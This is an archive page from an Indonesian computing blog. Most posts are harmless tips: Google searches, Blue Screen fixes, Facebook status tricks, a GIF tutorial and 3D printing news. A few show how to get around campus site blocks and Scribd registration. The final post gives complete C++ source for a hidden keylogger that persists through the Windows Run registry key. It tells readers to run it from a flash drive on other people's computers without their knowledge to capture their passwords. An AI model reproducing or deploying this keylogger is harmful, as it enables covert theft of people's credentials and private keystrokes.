-->

K.E ^_~ Yang lagi galau ini penawarnya link

0 Marhaban ya Ramadhan

Tak terasa, seperti baru kemarin saia menulis ini, sekarang bulan suci Ramadhan sudah menghampiri kembali. Alhamdulillah ya ALLAH Engkau memberikan nikmat tanpa batas, dengan kuasa-Mu kami dipertemukan kembali dengan bulan suci penuh rahmat, hidayah dan pengampunan-Mu.

Sebagai pengingat diri, bahwa semua yang ada di dunia ini memiliki masa kadaluarsa, yang kemarin sehat boleh jadi sekarang sakit, kemarin hidup boleh jadi sekarang telah berada di liang lahat terhimpit bumi. Astagfirullahaladziim, Subhanallah, Allahuakbar, dengan kuasa-Mu juga jari saia masih bisa menekan tombol keyboard untuk mempelajari dan menyampaikan secuil ilmu-Mu yang Maha Luas.

Temans, Tahun ini mungkin kita masih bisa bertemu dengan bulan Ramadhan, akan tetapi tak ada satupun makhluk yang mampu menjamin hidup kita akan sampai pada Ramadhan tahun depan. So akankah kita mau menyia-nyiakan waktu yang belum tentu kita raih di esok hari? hmmmm..coba tanya pada rumput yang bergoyang.he he :D

Marhaban ya Ramadhan, Saia atas nama klikedukasi memohon maaf atas segala khilaf dan dosa yang sengaja maupun tak disengaja, maaf atas segala salah kata yang tertulis, kata yang diam tapi menusuk tajam pembacanya. Semoga kita masuk bulan suci ini dalam keadaan termaafkan oleh saudara saudara kita. آمِيّنْ... آمِيّنْ... يَ رَ بَّلْ عَلَمِيّنْ

0 Google Search @_@

Bismillahirohmanirrohim :)
Langsung bae ya ,tek gawe dokumen neng kene <<< Extended Java Lang :D

Bagi kalian yang suka mendownload dari Mediafire saya berikan sedikit tips untuk kalian .

ketikkan :
site:mediafire.com "nama file" atau
site:mediafire.com "nama file" "ekstensi file"

Dengan begitu otomatis kita mendapatkan hasil pencarian dengan link mediafire semua .
Kalian juga bisa merubah "mediafire.com" dengan situs hostingan yang lain .

Happy Google Day @_@


Update Artikel dari Grup Klikedukasi di Facebook:
Penulis Artikel ini:
Devilish Kiddies | Blogger, Facebook

4 Perbaikan Komputer Pada Kasus Windows Blue Screen Errors

Sedikit share ni buat agan2 disini, krna dituntut oleh agan havis untuk sharing ilmunya. ane kpikiran untuk brdiskusi tentang masalah blue screen. agan2 pastnya pernah ngalamin kejadian sperti ini kan? sungguh menyebalkan jika sedang asyik2nya ngutak-atik kompi atau sedang nginstal aplikasi bahkan nginstal ulang windows atau OS yg lain. pasti kejadian blue screen datang secara tak terduga.
Belajar komputer dan internet dalam kasus perbaikan komputer. Sepanjang pengalaman saya belajar komputer, salah satu kerusakan komputer yang sangat ditakuti oleh kaum pemula adalah Windows Blue Screen Errors. Apa dan mengapa Windows Blue Screen Errors? Itulah yang akan kita bahas pada kesempatan ini. Inilah pemecahannya; Kasus Windows Blue Screen Errors biasanya muncul dalam beberapa kasus. Ia bisa muncul pada proses instalasi Windows, ketika sementara booting dan bisa juga ketika kita sedang menjalankan sebuah program.

  1. Jika Windows Blue Screen Errors muncul ketika kita sedang menginstall Windows maka ada 3 kemungkinan masalahnya, yaitu (1) CD Drive rusak dan tidak mampu membaca secara sempurna CD Instalasi, (2) CD Instalasi rusak sehingga tidak bisa dibaca sempurna oleh CD Drive, (3) gejala-gejala bahwa Hard Disk akan segera rusak. Ketiga gejala ini harus dipastikan dan dicarikan jalan keluarnya.
  2. Jika Windows Blue Screen Errors muncul ketika sedang booting maka kemungkinan penyebabnya adalah sebelumnya komputer mati/dimatikan secara tidak wajar maka sistem operasi mengalami kerusakan. Solusi atas masalah ini adalah melakukan reparasi sistem operasi. Petunjuk mengenai proses reparasi ini telah saya uraikan dalam free ebook PANDUAN TEKNISI KOMPUTER, terutama pada buku 3 tentang perbaikan komputer.
  3. Kasus ketiga adalah Windows Blue Screen Errors ketika sedang menjalankan sebuah program. Walaupun dalam kenyataannya agak jarang terjadi dibandingkan dengan kasus nomor 2 dan nomor 1 di atas.
Sebelum mengambil langkah reparasi komputer Anda harus terlebih dahulu mengidentifikasi jenis kesalahan itu. Jika ketika Anda mereboot komputer Anda dan Windows Blue Screen Errors langsung muncul ikuti langkah-langkah di bawah ini. Jika ternyata Anda tidak dapat masuk ke Windows untuk melakukan perbaikan, boot komputer ke dalam Safe Mode. Setelah masuk Safe Mode, lakukan langkah-langkah dibawah ini;

  1. Dari desktop klik kanan pada [My Computer].
  2. Klik pilihan [Properties].
  3. Di jendela System Properties klik tab [Advanced].
  4. Dalam Advanced klik tombol [Settings] di bawah [Startup and Recovery].
  5. Pada jendela Startup and Recovery hapus centang pada kotak centang restart secara otomatis.
  6. Klik Ok.
Dalam kasus Windows Blue Screen Errors yang lain pada Windows NT, 2000, XP dan Vista, mungkin mirip dengan contoh yang ditunjukkan di bawah ini. Untungnya pesan error ini sering mengandung informasi lebih rinci, dan karena berisi informasi maka kita dapat lebih mudah mencari solusinya. Perhatikan gambar dibawah ini;


  1. Identifikasi jenis layar biru yang dipisahkan sebuah garis bawah yang berisi huruf kapital bukan ruang, seperti contoh di bawah: BAD_POOL_HEADER.
  2. Pada bagian atas, ada tulisan STOP: pesan kesalahan di atas kesalahan, atau dalam “Informasi Teknis” bagian dari kesalahan. Sebagai contoh, di atas kesalahan itu STOP: diikuti tulisan 0×00000019 … menunjukkan keragaman kesalahan selanjutnya.
  3. Pada akhir informasi teknis biasanya ditampilkan file dan alamat.

Setelah Anda memiliki informasi di atas Anda dapat mulai troubleshooting masalah. Dari membaca tampilan berikut ini saya pikir anda sudah bisa menduga dimana letak masalahnya.

BAD_POOL_HEADER
DRIVER_IRQL_NOT_LESS_OR_EQUAL
DRIVER_POWER_STATE_FAILURE
INACCESSIBLE_BOOT_DEVICE
IRQL_NOT_LESS_OR_EQUAL
KMODE_EXCEPTION_NOT_HANDLED
NTFS_FILE_SYSTEM
PAGE_FAULT_IN_NONPAGED_AREA
STATUS_IMAGE_CHECKSUM_MISMATCH
THREAD_STUCK_IN_DEVICE_DRIVER
UNEXPECTED_KERNEL_MODE_TRAP
UNKNOWN_HARD_ERROR
Jika anda menghadapi Windows Blue Screen Errors tidak seperti tulisan di atas itu berarti Windows Blue Screen Errors yang anda hadapai adalah Fatal exceptions. 
source http://agussale[dot]com/perbaikan-komputer-pada-kasus-windows-blue-screen-errors

Update Artikel dari Grup Klikedukasi di Facebook


Penulis Artikel ini: Denih Handoko


4 Buka Situs yang diblokir di Kampus ato Kantor

Sowry man teman kalo trickny cupu dan mungkin dah banyak yang tau..hehe
jd inget kemaren hotspotn dkampus (maklum ank kos ga kuat isi pulsa) kok ane gak bs buka facebook yaakkk...dan site yg laen2 (sory sensor xiixiixii)wah di block neeeh...

Stlah searching sana sini akhirny nemu cra yg lumayan ampuh jg..step by stepny cekicrrooot gan..

  • langsung masuk ke rumah si mbah google.,trs masuk menu terjemahan..
  • pada box isi tulis url yg kalian ingin buka contoh: http://facebook.com/   <<<-harus lengkap yah...
  • klik translate maka akan muncul logo facebook...
  • langsung aja klik logo facebook tersebut..
  • setelah itu akan muncul halaman loginnya.,masukan aja user dan pass seperti biasa kemudian login.,
  • nanti akan muncul notif keamanan dari facebook ynag memperingatkan untuk tidak melakukan login ke facebook dari tempat lain.,lanjutkan saja masukan data akses kamu, gak usah khawatir karena kamu buka facebook melalui akses google..
sekian semoga bisa bermanfaat.,share and improving!!

Source:Allah swt

by:Banditoz a.k.a Hapizz

Update Artikel dari Grup Klikedukasi di Facebook:
Penulis Artikel ini:
Haviz Vaisal 
| Blogger, Facebook

13 Download di scribd.com tanpa register

Update Artikel dari Forum diskusi Klikedukasi di Facebook:

Penulis Artikel ini:
Haviz Vaisal 
| Blogger, Facebook

Mungkin temen2 pernah mau download dokumen di scribd.com??tapi gak jadi karena harus register dulu dll,dsb.etc

oke..ane ada sedikit trick biar kita gak usah melalui tahapan yg ribet itu..

cekiidot...

  • langkah pertama buka artikel yg tmn2 mau download di scribd.com
  • lihat bagian url'ny seumpama kita mo download dokumen dgn judul "pascal" url'ny (http://www.scribd.com/doc/37451255/Pascal)
  • lihat angka2 yg ane ketik tebal,.itu adlh id dokumen tersebut
  • untuk mendownloadnya tanpa melakukan register kita cukup menggantinya melalui versi mobile.,caranya bijimana???
  • ganti url tersebut menjadi http://www.scribd.com/mobile/documents/37451255(id dokumen yg ingin di download) lalu tekan enter.
  • taraaaaang...dokumen kita siap di sedot..
source:allah swt

Update: Trik ini sudah tidak bisa digunakan, keterangan mengenai penyebabnya silahkan baca Alasan tidak dapat download di scribd

4 Integrasi Aplikasi klikedukasi di facebook

Beberapa hari yang lalu, saia berhasil merampungkan landing page klikedukasi di facebook. Dalam aplikasi ini sengaja saia integrasikan beberapa elemen yang sudah ada sebelumnya, agar pengunjung lebih mudah mengakses fitur yang ada. Berikut aplikasi yang saia integrasikan, silahkan dicoba:
--------------------------------------------------------
Tunggu beberapa saat sampai Aplikasi selesai loading. . . .
--------------------------------------------------------


Aplikasi ini memiliki 4 menu yaitu Hot News, Store, TTS Online, dan sebagai menu tambahan Status Biru.

1.) Hot News: anda dapat membaca berita berita terbaru dari situs berita Indonesia seperti detikcom, kompas, vivanews dan update tulisan terbaru dari blog klikedukasi

2.) Store: Berisi demo produk dari toko online http://distrocentre.com

3.) TTS Online: bagi yang hobi otak atik TTS, pada menu ini disediakan TTS online yang bisa dimaenkan di facebook, dan akan terupdate secara berkala.

4.) Status Biru: Sebagai tambahan menu, disediakan Tutorial cara membuat status hyperlink berwarna biru

 Untuk melihat aplikasi ini di facebook silahkan masuk kesituh http://www.facebook.com/klikedukasi

1 Forum diskusi klikedukasi di facebook

Temans, klikedukasi sekarang memiliki forum diskusi di facebook. Kita bisa bertukar informasi seputar dunia komputasi di forum ini. forum ini diharapkan bisa jadi ladang amal buat sharing, dan bisa jadi ladang solusi bagi yang membutuhkan. silahkan gabung ke grup "klikedukasi" kesini http://www.facebook.com/groups/klikedukasi/

Grup Klikedukasi bertujuan sebagai wahana sharing ilmu pengetahuan, mencari solusi dan diskusi bersama mengenai dunia komputasi. Tak ada yang lebih hebat disini, tak ada pula yang lebih bodoh. Kita semua memiliki kelebihan dan kekurangan masing-masing. Yang sudah tahu silahkan dishare pengetahuannya, dan yang belum tahu silahkan bertanya.

Semua masalah akan terasa ringan jika kita bekerjasama untuk memecahkannya. Orang yang hebat adalah orang yang mau dengan ikhlas membagi pengetahuannya. Seperti kata salah satu admin, mari kembalikan pengetahuan pada hakikatnya yang gratis. Sejauh ini belum ada sejarahnya orang jatuh miskin karena berbagi pengetahuan.

Yang ingin bertanya seputar masalah komputer, insya ALLAH temen2 disana akan dengan senang hati membantu.

Berdasarkan suara terbanyak dari teman teman di grup, nantinya hasil diskusi akan diposting disini. Tentunya dengan menyertakan narasumber-nya. oke yang tertarik mengkuti perbincangan seputar dunia komputasi silahkan gabung 

**kunjungi dan jangan lupa di like
- fan pagenya
http://facebook.com/klikedukasi

3 Membuat sendiri Avatar Text Animasi dengan Ulead Gif Animator 5

Bagi yang belum punya Software nya Silahkan download di SINI 

Berikut Tutorial membuat Text animasi nya
• Pertama buat gambar baru [klik File > New] ukuran 100x100pixel .
(untuk ukuran sebenarnya terserah kalian ,tapi di sini saya akan membuat text untuk Avatar jadi disarankan ukurannya tidak melebihi 100x100pixel )
• Pilih Frame kemudian Add Banner Text .
Akan muncul kotak dialog seperti ini
Tuliskan text yang akan kalian jadikan Animasi ,kalian juga dapat merubah jenis Font ,warna Font ,dan ukuran Font seperti yang kalian inginkan .

• Atur Effect text [di sini saya menggunakan Effect Zoom out(rotate) untuk Enter Scene dan Effect Fade untuk Exit Scene]

• pilih Frame Control untuk mengatur delay / kecepatan Efek Animasi

• Tambahkan Efek Neon / Glow untuk mempercantik tulisan 


Selesai !Simpan file sebagai (*.gif) images ,[File > Save As > GIF File]
Hasil dari tutor di atas :


Update Artikel dari Sahabat Klikedukasi:

Penulis Artikel ini:Devilish Kiddies

 

61 Beginilah cara membuat status biru di facebook

Rame rame para facebooker nge-like fan page yang menawarkan cara membuat status menjadi berwarna biru yang memiliki Link ke halaman tertentu. Penasaran juga, gimana sih cara membuatnya?

Ternyata gak terlalu rumit, anda hanya butuh 'id' pengguna, yang bisa anda cari dengan URL ini https://graph.facebook.com/username. Username facebook itu yang mana ya? coba anda masuk ke facebook, kemudian masuk ke halaman profile anda, sekarang cek pada addressbar bentuknya kurang lebih seperti ini http://www.facebook.com/username,  contoh URL halaman profile fb saya adalah http://www.facebook.com/170p3x . Nah dari situ udah kelihatan username saya yaitu 170p3x, untuk melihat 'id' fb masukkan username tadi ke alamat di atas menjadi seperti ini https://graph.facebook.com/170p3x. 

Sekarang saatnya  MEMBUAT STATUS BIRU FACEBOOK
STATUSBIRU
Gambar di atas itu yang dimaksud dengan status biru. Lantas bagaimana cara membuatnya?
ikuti petunjuk berikut:

1. Jika berkenan silahkan like dulu page ini. Jika tidak di like juga tak masalah, anda masih bisa membuat status biru..he he :p



2. Klik gambar disampingSTATUS BIRU

3. Akan keluar window baru

4. Perhatikan kolom status, ada kode seperti ini
@[136044869785541:0: TULIS STATUS KAMU DISINI ]
Silahkan ganti tulisan yang berwarna BIRU dengan statusmu. Untuk kode @[136044869785541:0: jangan dihapus, kode tersebut yang membuat status anda berubah menjadi biru

5. Setelah selesai Klik tombol Bagikan, sekarang kembali ke halaman facebook kamu
 daaan kamu berhasil membuat status berwarna biru

Notes: Cara yang ini sudah tidak bisa, sekarang sudah ada cara baru untuk membuat status atau komentar biru baca triknya disitu Cara baru membuat status biru

0 [TTS Online] bagian 2 (V.2) materi Teknologi Informasi

Mengikuti pendahulunya yaitu TTS Online klikedukasi V.1 disini, TTS bagian kedua ini dapat dimainkan pula pada blog ini dan bagi para facebooker bisa juga TTS ini dimainkan di facebook.

Update kali ini ada beberapa perubahan yang mencakup materi dan warna. Jika sebelumnya materi TTS mencakup hal hal yang bersifat umum, TTS bagian kedua ini mencoba mengasah pengetahuan anda dalam hal teknologi informasi (komputer secara umum). Warna TTS juga sengaja saya ubah menjadi abu abu. Mau mencoba??

TTS Online Klikedukasi Pindah tempat

5 [3D Printer] Teknologi yang memungkinkan kita membuat kue coklat dengan printer

Pernahkah anda memainkan game "Purble Place" bawaan windows 7?. dalam game ini ada sebuah mesin pencetak kue coklat, yang mampu mencetak bentuk coklat sesuai dengan pesanan pelanggannya. Mungkin game ini sewaktu dirancang hanya sebatas imajinasi dari pembuatnya.
Lihat screenshot game Purble Place di bawah:


Baru baru ini tim dari Universitas Exeter telah mengembangkan sebuah printer 3 dimensi yang bekerja mirip dengan Mesin yang ada pada game Purble Place. Printer ini mampu mencetak coklat sesuai dengan bentuk yang kita inginkan.



Prinsip kerja Printer 3D ini adalah dengan membangun lapisan (layer) yang berurut dari materi pembentuk [coklat]. Teknologi ini sudah digunakan dalam industri untuk memproduksi produk plastik dan logam tapi implementasi prinsip ini baru pertama kali diterapkan untuk cokelat.

Tantangan yang dihadapi untuk membuat kue coklat dengan printer 3D ini adalah sifat dari coklat itu sendiri. Coklat kurang tahan terhadap panas. Sehingga membutuhkan pemanasan yang akurat dan proses pendinginan yang cepat, agar cetakan yang dihasilkan sesuai dengan desain yang kita buat.



Di masa mendatang teknologi ini dapat digunakan oleh kita untuk merancang berbagai produk sendiri sesuai dengan kebutuhan dan preferensi pribadi kita. Bahkan teknologi semacam ini sangat memungkinkan orang untuk menghasilkan dan merancang produk lain seperti barang-barang perhiasan atau rumah tangga sendiri, seperti halnya kita dapat mencetak hasil ketikan kita dari Ms. Word sekarang. Bukan hal yang mustahil jika akhirnya kita dapat melihat produk yang ada dipasaran adalah hasil produksi dari individu, bukan industri besar. :D semoga

Referensi: Satu, Dua

20 Membuat keylogger di flashdisk

Keylogger merupakan sebuah perangkat komputer baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. Sebuah keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol keyboard tersebut ke dalam sebuah berkas log/catatan/rekaman. Beberapa keylogger tertentu bahkan dapat mengirimkan hasil rekamannya ke e-mail tertentu secara periodik (wikipedia). Kalimat mudahnya keylogger adalah sebuah program yang dapat mencuri data akun (username, password) dengan cara merekam penekanan tombol pada keyboard.

Keylogger yang hendak kita buat menggunakan bahasa pemrograman C++, bagi agan yang belum paham apa itu C++ silahkan gugling, pelajari sendiri ya, jangan malas buat searching, reading n experiment. :P

langsung ja deh.,...ni POCny man teman....

• Pertama nte harus menyediakan flash disk ato USB (yang g jorok atau bebas virus ya, biar kompu orang g rusak).
• Lalu nte mesti download compiler C++. Bisa agan download di sini
• Setelah di install, open dan tulis code ini #copas juga buleh :P

#include 
#include 
#include 

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
 
    int test,create;
    test=test_key();
        
    if (test==2)
    {
        char *path="c:\\%windir%\\Log.exe";
        create=create_key(path);
          
    }
        
 
    int t=get_keys();
    
    return t;
}  

int get_keys(void)
{
            short character;
              while(1)
{
                    
    for(character=8;character<=222;character++)
{
    if(GetAsyncKeyState(character)==-32767)
{  
                            
     FILE *file;
    file=fopen("log.log","a+");
if(file==NULL)
{
return 1;
}            
if(file!=NULL)
{        
if((character>=39)&&(character<=64))
{
    fputc(character,file);
    fclose(file);
    break;
}        
    else if((character>64)&&(character<91))
{
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
}
    else
{
    switch(character)
{
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;    
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                            
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;    
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                                
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }        
                                   }    
                              }        
                    }    
                }                  
                    
            }
            return EXIT_SUCCESS;                            
}                                                

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
    
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {    
        check=1;
        return check;
    }        
          
    reg_key=RegQueryValueEx(hKey,"Log",NULL,NULL,(LPBYTE)path,&buf_length);
    
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
        
    RegCloseKey(hKey);
    return check;  
}
 
int create_key(char *path)
{  
        int reg_key,check;
        
        HKEY hkey;
        
        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"Log",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;
                
        return check;
}
 

• Nah, setelah itu nte Complie atau run, tapi enakan klik Rebuild All, bisa agan temukan di Execute>Rebuild All

• Nah berhubung program sudah jalan, wajib nte end process “Log.exe “nya di Windows Task Manager.Save program dengan nama “Log”.

• Sekarang, coba nte buka my document, pasti dah ada program nya “Log.exe” dan tempat hasil Log-an nya yang bernama “Log”

• Tetapi apabila anda ingin mengganti nama program nya menjadi nama yang anda ingin kan seperti contoh “Havizganteng”, bias anda ubah code nya di sini

char *path="c:\\%windir%\\Havizganteng.exe";

file=fopen("Havizganteng.log","a+");

reg_key=RegQueryValueEx(hKey,"Havizganteng",NULL,NULL,(LPBYTE)path,&buf_length);

RegSetValueEx((HKEY)hkey,"Havizganteng",0,REG_SZ,(BYTE *)path,strlen(path));

• Na, kan sudah menjadi folder, tinggal nte copy ke flash disk

• Selanjutnya, tinggal nte jalanin aja di kompu orang lain lewat flash disk nte, untuk menghentikan “Log.exe’ / Keylogger nya, bisa kalian end process di Windows Task Manager / ctrl+alt+delete

• Tetapi kalau yang punya kompu Tanya “ko flash disk nya g d lepas?”, na tinggal basa-basi da ama yang punya computer,, hehehehhehehehe


slese dah.,

Source:
Allah Swt,
armytheludher(Devilsc0de)
 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x